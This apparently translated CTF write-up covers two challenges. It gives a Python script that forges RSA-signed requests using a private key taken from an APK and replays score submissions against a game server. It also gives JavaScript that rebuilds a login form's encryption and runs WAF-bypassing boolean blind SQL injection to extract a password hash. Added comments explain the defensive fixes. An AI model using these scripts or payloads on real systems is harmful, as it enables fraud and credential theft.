gameapp
For this challenge I first decompiled the APK and skimmed the code: there are mainly two APIs, startgame and score. I then installed the APK in an emulator (rather than on a physical phone) and captured the traffic; the request bodies are RSA-encrypted, so the first step was to reproduce the RSA step in Python (the private key is one that has been used before and can be found by searching online, so I simply adapted someone else's script). The challenge asks for 99999 points, but a single request is worth at most 100 points, so I send 100 points 999 times and 99 points once.
# CTF write-up script for the "gameapp" challenge. Python 2 (print statements,
# str.encode('base64'), M2Crypto). Code kept as posted; comments only.
#
# What it demonstrates, read from the defender's side:
#   * The client "signs" its JSON by RSA-encrypting it with a private key that
#     ships inside the APK (and, per the write-up, is a well-known key that can
#     be found online). A key the client holds cannot authenticate the client:
#     anyone with the app can produce valid requests.
#   * The score endpoint trusts a client-supplied "score" value. A per-request
#     cap (100 per the write-up) does not help when the same request can be
#     replayed 999 times in one session; the score has to be computed
#     server-side, and repeated identical requests are a signal worth alerting on.
import cPickle,M2Crypto,os,urllib,requests  # cPickle, os and urllib are not used in this script

BaseUrl="http://121.40.219.183:9999/"

# Private key used by the app to "sign" requests (PKCS#1 PEM; looks like a
# 1024-bit key, so a PKCS#1 v1.5 block holds at most a short payload).
sign_pri='''
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYImonQdMC1Y8USwIwf7Y0GcBP
/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8aYFoms223okyzeTlUIRHbIkto
1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEA3Hau/DTzW4g4xhvzQIDAQAB
AoGAVHWs7rAnT28ZHtPUCNzqulXrlnBIhx3JMejJfqfR8H7vff2TqcA4FEEr2QNx
U0Pj0tzqS9KrO1EpQ7FwXtheoAmf3tQb5BDxPxcph2820qa/AcIxHpf5LqfONs9d
UrozcR23s561yjX7w5akeRzOwrq2BKwVtF/EoXvJTQKlwV0CQQDY96T70hxUOLoJ
FrLelwl/4Heb0Lrz83lMB6UXknUbJgOiZr/KD9NzEM477MqzKD2rTM4TeULX6cNd
hXm35daXAkEAyWtkRrStowoiscynG1KfaT4ksbbHWr53iqAhv7Z3SAshn3k9TURk
kLCQhyIcXXnuEEGFlK84WxQSy2Q6uLI9OwJBAMpLdE+7IuDAF2z79gCmUJwjfUIR
hw6H95OVGS/2RSvv8LmOFcpfoSaLB89Fw+TxYzaBoS71BAbulVJwbgGx0bcCQQCs
rJxy4UJam73Sn5hDHDn9h4D9uax+ZvskpNNJ/6uS37gbd1zOeOud/0BoGR4oJPeq
iAF0ziKKMlNKesq8vFExAkEAsvLbn5avP/CEkXZB4sRDV/gD3mK+IY5p+ZlBSYAe
KhVKdUXkdJwNqBn+iJMwFhMC7xHIbijLRe3hL9ZB0vt1nQ==
-----END RSA PRIVATE KEY-----
'''


def private_encrypt(data):
    """Return *data* encrypted with the private key (PKCS#1 v1.5 padding), base64-encoded.

    This is the raw private-key operation on the unhashed message, i.e. the
    primitive a signature is built from, applied to the JSON bodies the app
    sends. `data` must fit in one RSA block.
    """
    rsa_pri = M2Crypto.RSA.load_key_string(sign_pri)
    ctxt_pri = rsa_pri.private_encrypt(data, M2Crypto.RSA.pkcs1_padding)
    # Python 2 'base64' codec: wraps the output with newlines (the server
    # evidently tolerates that, since the requests below succeed).
    ctxt64_pri = ctxt_pri.encode('base64')
    return ctxt64_pri


def public_decrypt(msg):
    """Inverse of private_encrypt using the matching public key.

    Takes the base64 text and returns the recovered plaintext. Defined for
    checking captured traffic; it is not called anywhere in this script.
    """
    sign_pub='''
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMY
ImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8a
YFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHE
A3Hau/DTzW4g4xhvzQIDAQAB
-----END PUBLIC KEY-----
'''
    bio = M2Crypto.BIO.MemoryBuffer(sign_pub)
    rsa_pub = M2Crypto.RSA.load_pub_key_bio(bio)
    ctxt_pri = msg.decode("base64")
    output = rsa_pub.public_decrypt(ctxt_pri, M2Crypto.RSA.pkcs1_padding)
    return output


# --- replay: one startgame, then 999 x 100 points and 1 x 99 points -------
data1 = '{"player" : "user"}'
# A Session persists whatever cookies the server sets, so the score posts
# below land in the same game as the startgame call.
a = requests.Session()
# 'xxx' is a non-standard Content-Type; presumably copied from the captured
# traffic, and the server does not appear to check it.
a.post(url=BaseUrl+"startgame/",data=private_encrypt(data1),headers={'Content-Type':'xxx'})
for i in range(999):
    r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":100,"op":"add"}"""),headers={'Content-Type':'xxx'})
    print r.text
# NOTE(review): the url argument on the next line is garbled in the posted
# listing; by analogy with the loop above it was BaseUrl+"score/".
r=a.post (url = BaseUrl + score /"",data=private_encrypt("""{"score":99,"op":"add"}"""),headers={'Content-Type':'xxx'})
print r.text

# Fetch the root page afterwards (presumably where the result/flag is shown).
r=a.get(url=BaseUrl,headers={'Content-Type':'xxx'})
print r
print a
Inject4Fun
There is not much to say about this challenge; just two points to summarize.
1. Implementing the front-end encryption
// Front-end "encryption" of the login form as reconstructed from the page's
// JavaScript, run from the browser console. Read from the defender's side:
//   * The AES key `a` is chosen by the client and sent RSA-wrapped in `code`;
//     the IV is a constant. CBC with a fixed key/IV and ZeroPadding gives no
//     integrity protection, and ZeroPadding cannot distinguish a trailing
//     0x00 byte from padding.
//   * Whatever the server decrypts is still attacker-controlled input, so
//     this layer does nothing against SQL injection in `username` (see the
//     payloads at the end); only parameterized queries fix that.
var password = "admin";
var username = "admin";
var a = '1234567890abcdef';                                 // 16-character AES key string, chosen client-side
var key = CryptoJS.enc.Latin1.parse(a);
var iv = CryptoJS.enc.Latin1.parse('1234567890123456');   // constant IV
var data1 = username;
var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
var data2 = password;
var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
var rsa = new RSAKey();
var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
var exponent = "010001";
rsa.setPublic(modulus, exponent);
var res = rsa.encrypt(a);                                   // the AES key, wrapped with the server's RSA public key
var xhr = new XMLHttpRequest();
xhr.open("POST","http://129.204.73.141:2000/login.php",false);   // third argument false: synchronous request
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
// NOTE(review): the ciphertexts are concatenated without encodeURIComponent,
// so a '+' in the base64 text reaches the server as a space — a possible
// source of intermittent failures; unverified.
xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res);
xhr.response   // available here only because the request was synchronous
// 2. Bypassing the WAF — the write-up gives the payload directly:
var username = "admin'=(left(right(password,1),1)>'a')='1";   // server answers "wrong password"
var username = "admin'=(left(right(password,1),1)<'a')='1";   // server answers with its other ("wrong user") message; the original comment is garbled in the source
I don't know why, but the WAF on this challenge is flaky; it seems to trigger randomly. This can be worked around by changing the 16-character key (the one that is meant to be randomly generated).
Because of the flaky WAF, the 32-character hash cannot be extracted in a single run; several runs with changes are needed to obtain the complete hash.
// Character-by-character recovery loop from the write-up (the WAF-bypass
// variant of the script above). From the defender's side: a boolean-based
// blind injection needs only a yes/no oracle — here the presence of the
// "wrong password" message — and this loop issues up to 32 x 16 near-identical
// login POSTs, which a rate limit or login-anomaly alert would catch. The
// real fix is parameterized queries; a WAF is only a speed bump.
var pass='';
var s='1234567890abcdef';                  // alphabet tried: hex digits
for(var n=1;n<33;n++)                      // 32 positions -> looks like a 32-character hex digest; assumption
{
  for(var i in s)                          // for-in over a string yields its indices
  {
    var password = "admin";
    // right(password,n) then left(...,1): the n-th character counted from the end
    var username = "admin'=(left(right(password,"+n+"),1)='"+s[i]+"')='1";
    var a = '1234567890abceef';            // key differs from the first script ('abcdef' -> 'abceef'); see the WAF note in the write-up
    var key = CryptoJS.enc.Latin1.parse(a);
    var iv = CryptoJS.enc.Latin1.parse('1234567890123456');
    var data1 = username;
    var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
    var data2 = password;
    var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
    var rsa = new RSAKey();
    var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
    var exponent = "010001";
    rsa.setPublic(modulus, exponent);
    var res = rsa.encrypt(a);
    var xhr = new XMLHttpRequest();
    xhr.open("POST","http://129.204.73.141:2000/login.php",false);   // synchronous
    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    // NOTE(review): setTimeout(xhr.send(...),1000) calls send() immediately and
    // schedules its return value (undefined); the 1000 ms delay has no effect.
    setTimeout(xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res),1000);
    if(xhr.response.search('wrong password')!=-1)
    {pass+=s[i];console.log(s[i]+' '+n);break;}   // pass is assembled last character first, i.e. reversed
  }
}